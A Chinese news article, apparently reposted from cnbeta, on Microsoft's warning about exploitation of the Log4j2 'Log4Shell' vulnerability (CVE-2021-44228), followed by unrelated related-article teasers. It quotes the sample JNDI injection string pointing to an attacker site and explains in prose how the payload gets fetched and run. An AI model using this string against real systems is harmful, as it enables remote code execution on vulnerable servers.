首页 > 业界 > 关键词  > 正文

微软警告比SolarWinds影响更深远的Log4j2漏洞利用

2021-12-16 10:32 · 稿源: cnbeta

微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。

据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。

CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串:

${jndi:ldap://[attacker site]/a}

美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。

CISA 负责人 Jen Easterly 于昨日接受 CNN 采访时重申,若不迅速采取补救措施,各个联邦机构的设备、服务、乃至整个互联网,都将处于一个相当可怕的境地。

微软警告称,Log4j2 的风险源于两个方面。其一是漏洞可被轻松利用,其二是基于其构建的产品数量 —— 而 Apache Log4j2 就是当前最流行的 Java 日志库之一。

据悉,日志库用于为开发者提供有关服务和产品的附加信息,允许其控制在应用程序执行期间、用户登录特定服务 / 设备的错误报告,并在遇到功能问题时收集相关数据。

通过日志库的使用,开发者还可深入了解或收集设备详情,包括 CPU 类型 / GPU 型号、驱动程序版本、以及系统内存等。

攻击者会对使用 Log4j2 生成日志的目标系统执行 HTTP 请求,该日志利用 JNDI 向攻击者控制的站点执行请求,最终导致被利用的进程访问站点并执行有效负载。

在许多观察到的案例中,攻击者往往拿到了 DNS 日志系统的参数,旨在记录对站点的请求、以对易受攻击的系统进行指纹识别。

此前已知的一种漏洞利用,涉及微软旗下的《我的世界》服务器。攻击者以聊天框作为中部署的消息内容作为管道,试图渗透用户系统并夺得控制权。

事实上,全球许多知名企业都面临着巨大的风险,其中不乏微软、Twitter、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare 等科技巨头。

网络安全公司 Check Point 指出,截至目前,其 GitHub 项目的下载量已经超过 40 万次。遗憾的是,尽管 Apache 已经发布了一个修补程序,但各家公司的实施方案不尽相同。

对于数百上千万的客户来说,这意味着他们仍将在未来一段时间里面临 Log4j 入侵风险,或导致大量用户数据暴露于在外。

举报

  • 相关推荐
  • 中国大集与马来西亚Wisepost Solutions达成战略合作,东南亚数字贸易新通道正式开启

    2025年12月8日,“临沂商城·中国大集海外数字商城(马来西亚)新闻发布暨采购对接会”在马来西亚吉隆坡与中国临沂同步连线举行。这标志着中国大集与马来西亚合作伙伴Wisepost+Solutions正式达成战略合作,双方将共同搭建面向东南亚市场的数字贸易协同平台,通过资源整合与本地化运营能力相结合,系统提升中马企业在供应链协同、合规对接等关键环节的合作效率,推动中马跨境采购进入数字贸易新阶段。

  • 国有国宝,家有萌宝!健合Solid Gold素力高联名萌兰以科学营养养出高能萌主

    随着宠物经济精细化发展,宠物品牌Solid Gold素力高联合北京动物园大熊猫“萌兰”推出跨界联名,以“国有国宝,家有萌宝”为主题,通过线上线下互动传播科学养宠理念。品牌借助萌兰健康活力的形象,推广其高蛋白猫粮等产品,并打造系列限定周边,强化用户参与感。同时,品牌积极投身公益,关注流浪动物保护,致力于推动行业进步,共建人宠和谐未来。

  • Vlog相机怎么选?佳能R50V领衔,六款高人气设备深度解析

    在Vlog成为主流创作方式的时代,一台得心应手的拍摄设备至关重要。本文梳理了六款聚焦视频创作、各具特色的相机,助你找到适合讲述下一段故事的那一款。其中,佳能R50V以全面的均衡性,成为大多数人的优质选择,被誉为“重新定义了入门级视频创作设备标准”的产品。它在画质、对焦、创意功能、直播便利性和可靠性五个维度做到了同价位罕见的平衡与强大。其他如松下GH6、富士X-S20、尼康Z30、奥林巴斯E-M10 Mark IV则分别在专业、色彩、简约和美学上深耕,等待与特定品味的创作者共鸣。选择Vlog相机,本质上是选择一种创作语言和生活方式。明确你最常拍摄的场景、最看重的特质以及预算范围,便能从这五款各有千秋的产品中,找到那个能忠实记录、自由表达的创作伙伴。

  • 真我16 Pro系列官宣:全球首发LumaColor影像技术

    真我宣布与莱茵TV合作建立LumaColor影像实验室,即将登场的真我16 Pro系列将全球首发LumaColor影像技术。 真我介绍,LumaColor影像技术由真我和莱茵TV联合研发,基于这项先进的影像技术,真我16 Pro系列将带来标杆级的人像拍摄体验,能拍出肤色自然、光影层次分明、氛围感十足的人像作品,让画面更具真实感与情感张力。 具体来看,LumaColor采用了行业首创的光色协同处理方案,

  • 退货不退款 女子利用外卖平台漏洞薅羊毛25万

    近日,浙江台州椒江海门派出所接到某大型商超报警称,有人利用某外卖平台系统漏洞,以退款不退货”的方式实施诈骗,使商超累计损失近二十万元。 民警调查发现,嫌疑人程某自2024年下半年起,精准利用外卖平台售后规则漏洞,多次以退款不退货”的方式恶意下单,累计作案476起,涉及商品3000余件,骗取财物价值25万余元,单笔涉案金额从数百元至一千余元不等。 最终

  • 入选 InnoForce 50!Sandwich Lab 公布 Lexi 增长引擎,为全球 50 万企业提供增长支持

    12月6日,Sandwich Lab创始人郭振宇博士在极客公园创新大会上发布全新AI战略系统Lexi增长引擎。他指出,AI时代企业面临的核心挑战是“信号淹没”而非流量短缺,Lexi旨在通过“去噪能力”从复杂数据中锁定1%的真实增长信号,构建企业专属的“自进化增长模型”。该系统已覆盖全球80多个国家和地区,服务超50万家企业。同时,公司入选极客公园2025“InnoForce50”,标志着其“自主经营系统”理念获全球商业认可。

  • 三星Galaxy Z TriFold发布,铰链十年革新再塑折叠风尚

    三星近日发布Galaxy Z TriFold三折叠旗舰手机,展开后可达10英寸大屏,重新定义移动生产力与影音娱乐体验。该产品采用创新的双轨铰链结构,实现纤薄机身与强悍性能的平衡,并通过20万次折叠测试确保耐用性。搭载骁龙8至尊版移动平台与5,600mAh大电池,支持多任务协同与AI功能,如照片助手和浏览助手,提升使用效率。Galaxy Z TriFold不仅巩固了三星在折叠屏领域的技术领先地位,更为行业树立了形态创新与体验优化的新标杆。

  • 形态新生 探索未来 三星正式推出Galaxy Z TriFold

    三星Galaxy Z TriFold于2025年12月2日发布,采用两步折叠设计,展开后提供10英寸沉浸式大屏,兼顾便携性与影院级视觉体验。该机搭载骁龙8至尊版移动平台、2亿像素摄像头及大容量电池,通过创新的超薄精工装甲铰链、双轨结构及强化材料,提升了耐用性与流畅折叠效果。结合三星AI功能与优化的大屏交互,支持多任务并行、Samsung DeX桌面模式及Bixby多模态AI助手,显著增强了移动

  • 持续向折叠屏“无人区”探索:从 Galaxy Z TriFold 看三星精密制造的十年积淀

    三星于2025年12月2日发布首款三折叠屏手机Galaxy Z TriFold。该机以3.9毫米极致纤薄机身和10英寸沉浸大屏为核心,通过全新“超薄精工装甲铰链”实现稳定折叠与紧密贴合。搭载2亿像素影像系统及骁龙8至尊版平台,支持本地独立运行Samsung DeX桌面模式与多任务并行处理,并深度整合AI功能。产品以用户为中心,在便携性、高性能与生产力间寻求平衡,展现了三星在折叠屏领域的技术积累与创新理念。

  • 华为有对手了!三星宣布首款三折叠Galaxy Z TriFold 12月9日预定

    三星于12月2日正式发布首款三折叠手机Galaxy Z TriFold,起售价359.04万韩元(约合17302元人民币),12月9日开启预定。这是继华为Mate XT发布一年多后,全球首款真正意义上的竞品。该机采用G字形折叠方案,配备超薄铰链,实现流畅稳定的折叠效果。机身采用增强型装甲铝边框,背部为陶瓷玻璃纤维背板,兼顾轻薄与防摔。展开后为10英寸120Hz刷新率大屏,视觉体验相当于三台6.5英寸手机并列。核心搭载骁龙8至尊版,配备2亿像素主摄,内置5600mAh电池,支持45W快充。

今日大家都在搜的词: